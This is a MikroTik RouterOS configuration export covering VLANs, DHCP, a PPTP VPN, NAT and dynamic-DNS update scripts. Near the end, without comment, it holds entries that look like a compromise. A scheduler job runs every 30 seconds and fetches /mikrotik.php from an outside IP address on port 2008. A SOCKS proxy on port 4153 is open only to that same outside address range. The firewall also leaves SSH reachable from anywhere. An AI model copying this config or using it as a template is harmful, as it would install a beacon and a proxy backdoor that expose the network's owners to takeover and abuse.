# sep/23/2018 17:12:00 by RouterOS 6.43.2
# software id = 7X1Z-41C2
#
# model = 951Ui-2HnD
# serial number = XXXXXXXXXXX
/interface bridge
add admin-mac=AA:AA:AA:AA:AA:AA auto-mac=no comment=defconf name=bridge
/interface ethernet
set [ find default-name=ether1 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether2 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name=\
ether2-master
set [ find default-name=ether3 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether4 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether5 ] advertise=\
10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-b/g/n channel-width=20/40mhz-Ce \
disabled=no distance=indoors frequency=auto mode=ap-bridge ssid=\
MikroTik-E37B19 wireless-protocol=802.11
/interface pptp-client
add add-default-route=yes allow=mschap1,mschap2 connect-to=ISP_PUBLIC_IP \
default-route-distance=0 disabled=no max-mru=1490 max-mtu=1490 name=\
pptp-out1 user=xxxxxx
/interface vlan
add interface=ether5 name=cam vlan-id=10
add interface=ether5 name=lan vlan-id=12
add interface=ether5 name=srv vlan-id=11
/interface list
add exclude=dynamic name=discover
add name=mactel
add name=mac-winbox
add name=WAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip pool
add name=dhcp_pool0 ranges=10.15.0.2-10.15.0.254
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=lan lease-time=4w2d name=\
dhcp1
/interface bridge port
add bridge=bridge comment=defconf interface=ether2-master
add bridge=bridge comment=defconf interface=wlan1
add bridge=bridge interface=ether3
/ip neighbor discovery-settings
set discover-interface-list=discover
/interface list member
add interface=ether2-master list=discover
add interface=ether3 list=discover
add interface=ether4 list=discover
add interface=ether5 list=discover
add interface=wlan1 list=discover
add interface=bridge list=discover
add interface=lan list=discover
add interface=srv list=discover
add interface=cam list=discover
add interface=bridge list=mactel
add interface=bridge list=mac-winbox
add interface=ether1 list=WAN
/ip address
add address=192.168.88.1/24 comment=defconf interface=ether2-master network=\
192.168.88.0
add address=10.15.2.1/24 interface=ether5 network=10.15.2.0
add address=192.168.8.2/24 interface=ether1 network=192.168.8.0
/ip arp
add address=10.15.2.4 interface=ether1
/ip cloud
set ddns-enabled=yes
/ip dhcp-server network
add address=10.15.0.0/24 dns-server=10.15.0.1 gateway=10.15.0.1
/ip dns
set allow-remote-requests=yes servers=4.2.2.2
/ip dns static
add address=192.168.88.1 name=router
/ip firewall filter
add action=accept chain=input protocol=icmp
add action=accept chain=input connection-state=related
add action=accept chain=input connection-state=established
add action=accept chain=input comment="SSH Access" dst-port=22 protocol=tcp
/ip firewall mangle
add action=mark-routing chain=prerouting new-routing-mark=VPN passthrough=yes \
src-address=10.15.2.1-10.15.2.254
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" \
out-interface=ether1
add action=masquerade chain=srcnat out-interface=pptp-out1
/ip route
add check-gateway=ping distance=1 gateway=pptp-out1 routing-mark=VPN
add distance=1 gateway=192.168.8.1
add distance=1 dst-address=10.15.2.0/24 gateway=192.168.27.66
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system clock
/system routerboard settings
set silent-boot=no
/system scheduler
add interval=1m name=UpdateDNS on-event=Update_WAN policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-time=startup
add interval=5m name=test_schedule on-event=test policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-date=jan/30/2018 start-time=09:35:42
add interval=30s name=schedule4_ on-event=script4_ policy=\
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add dont-require-permissions=no name=Update_WAN owner=admin policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=\
"/ip dns cache flush\r\
\n/ip cloud force-update"
add dont-require-permissions=no name=test owner=admin policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="#\
\_Update DNS on Freedns.afraid.org\r\
\n:global host \"freedns.afraid.org\"\r\
\n:global url \"https://freedns.afraid.org/dynamic/update.php\?c3N2T"\r\
\n\r\
\n/ip dns cache flush\r\
\n/tool fetch url=\$url host=\$host"
add dont-require-permissions=no name=script4_ owner=admin policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
ddress=95.154.216.16 port=2008 src-path=/mikrotik.php mode=http keep-resul\
t=no"
/tool mac-server
set allowed-interface-list=mactel
/tool mac-server mac-winbox
set allowed-interface-list=mac-winbox